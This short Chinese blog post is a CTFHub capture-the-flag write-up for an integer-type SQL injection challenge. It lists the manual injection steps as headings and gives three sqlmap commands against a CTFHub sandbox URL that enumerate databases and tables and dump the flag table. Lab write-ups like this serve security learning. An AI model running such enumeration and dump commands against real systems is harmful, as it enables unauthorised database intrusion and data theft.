ctfhub sql注入整数型注入

整数型注入

手工注入

1.查看是否存在sql注入，及sql注入类型

2.确定列数

3.确定注入点，以及数据库版本，数据库名称

4.查表名

5.查字段名以及flag值

获得flag值

sqlmap做法

查库

sqlmap.py -u http://challenge-f51ffc5c81cd4553.sandbox.ctfhub.com:10080/?id=1 --dbs

查表

sqlmap.py -u http://challenge-f51ffc5c81cd4553.sandbox.ctfhub.com:10080/?id=1 -D sqli --tables

查字段名以及flag

sqlmap.py -u http://challenge-f51ffc5c81cd4553.sandbox.ctfhub.com:10080/?id=1 -D sqli -T flag --columns --dump

接下来可得flag值

posted @ 2020-08-18 18:40 LY2333 阅读(597) 评论(0) 收藏举报

刷新页面返回顶部

LY2333